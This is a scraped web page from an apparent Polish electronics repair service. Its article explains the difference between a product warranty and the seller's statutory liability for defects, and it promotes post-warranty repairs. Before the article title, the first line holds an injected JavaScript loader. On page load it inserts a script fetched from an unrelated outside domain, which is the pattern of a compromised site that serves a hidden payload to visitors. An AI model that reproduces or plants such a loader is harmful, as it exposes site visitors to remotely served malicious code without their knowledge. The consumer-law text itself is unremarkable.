;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gwarancja a rękojmia – różnice tych dwóch pojęć na podstawie sprzętu elektronicznego | Silico-Bit
Kupując sprzęt elektroniczny niejednokrotnie zastanawiamy się, co chroni nas w przypadku jego uszkodzenia. Raczej korzystamy ze sprawdzonego serwisu lub oddajemy sprzęt do sklepu z nadzieją, że obejmuje go gwarancja lub rękojmia. Jakie zdziwienie rysuje się na naszej twarzy, kiedy okazuje się, że niestety termin ochrony minął lub nie mieliśmy gwarancji na sprzęt. A co z rękojmią? Postaramy się w tym artykule uporządkować wiedzę na temat gwarancji, rękojmi i naprawy sprzętu na własną rękę w wyspecjalizowanym serwisie.

Naprawa pogwarancyjna

Co to jest rękojmia?

Rękojmia to odpowiedzialność sprzedawcy za wadliwy towar lub niezgodność z jego prawidłowym stanem. Rękojmia, z punktu widzenia praw konsumenta dotyczy zarówno wady fizycznej, jak i prawnej zakupionego towaru. Wówczas przysługuje klientowi prawo do bezpłatnej naprawy sprzętu, wymiany zakupionego towaru na nowy oraz obniżenia lub zwrotu ceny.

Od decyzji kupującego zależy, który wariant wybierze. Należy jednak zaznaczyć, że zwrot ceny towaru obowiązuje w ostateczności, jeśli sprzedawca nie będzie mógł spełnić pozostałych możliwości. Dzieje się tak w przypadku, kiedy towaru nie da się naprawić lub serwis będzie nieopłacalny.

Odpowiedzialność sprzedawcy na mocy prawa zobowiązuje go do podjęcia odpowiednich kroków. Podstawą do reklamacji towaru, w tym przypadku sprzętu elektronicznego, będzie dowód zakupu – paragon, faktura VAT, wydruk z karty płatniczej lub umowa.

Czas na zgłoszenie szkody

Czas, jaki ma konsument na zgłoszenie szkody, określa odpowiednia ustawa. Według obowiązującego prawa ma na to jeden rok od wykrycia wady. Natomiast sprzedawca odpowiada za towar przez dwa lata od daty wydania zakupionych rzeczy. Na rozpatrzenie reklamacji sprzedawca ma 14 dni. W tym czasie ma obowiązek zapoznać się z treścią reklamacji i złożyć odpowiedź o dalszym postępowaniu. Po tym czasie, jeśli nie będzie odzewu ze strony sprzedawcy, reklamację uznaje się za uwzględnioną.

Kiedy sprzedawca jest zwolniony z rękojmi?

Sprzedawca jest zwolniony z tytułu rękojmi w przypadku, kiedy konsument w momencie zakupu towaru wiedział o wadzie i nie składał żadnych roszczeń wobec tego faktu.

Co to jest gwarancja?

Gwarancja różni się znacznie od rękojmi zakresem odpowiedzialności i kwestiami prawnymi. O ile rękojmia przysługuje z tytułu prawa, o tyle gwarancja nie musi być w ogóle wydana. Jest to bowiem dobrowolne zapewnienie producenta o jakości towaru, który zakupił konsument. Gwarancja to dokument, który określa czas obowiązywania ochrony oraz jej warunki. Są tam umieszczone wszelkie informacje o podmiocie wydającym gwarancję, w razie potrzeby kontaktu konsumenta z producentem.

Niejednokrotnie dochodzenie swoich praw za wadliwy sprzęt polega na zgłoszeniu reklamacji, a wówczas producent zleca fachowcom jego naprawę. Czasami może dokonać także zupełnej wymiany sprzętu na nowy, jeśli naprawa okaże się nieopłacalna.

Gwarancja a rękojmia

Gwarancja to dobrowolnie wydane zapewnienie producenta o jakości towaru, natomiast rękojmia to obowiązującego każdego sprzedawcę prawo konsumenta do zgłoszenia wady zakupionego towaru. Rękojmię reguluje prawo, natomiast gwarancja to pewnego rodzaju dodatek do towaru.

Gwarancja a rękojmia

Niestety zarówno gwarancja, jak i rękojmia po jakimś czasie przestają obowiązywać. Co wówczas zrobić? Wiele serwisów sprzętu elektronicznego prowadzi naprawy pogwarancyjne. Jeśli jakakolwiek ochrona kończy swoją datę ważności, warto poszukać odpowiedniego serwisu, gdzie wyspecjalizowani fachowcy zajmą się kompleksową naprawą sprzętu.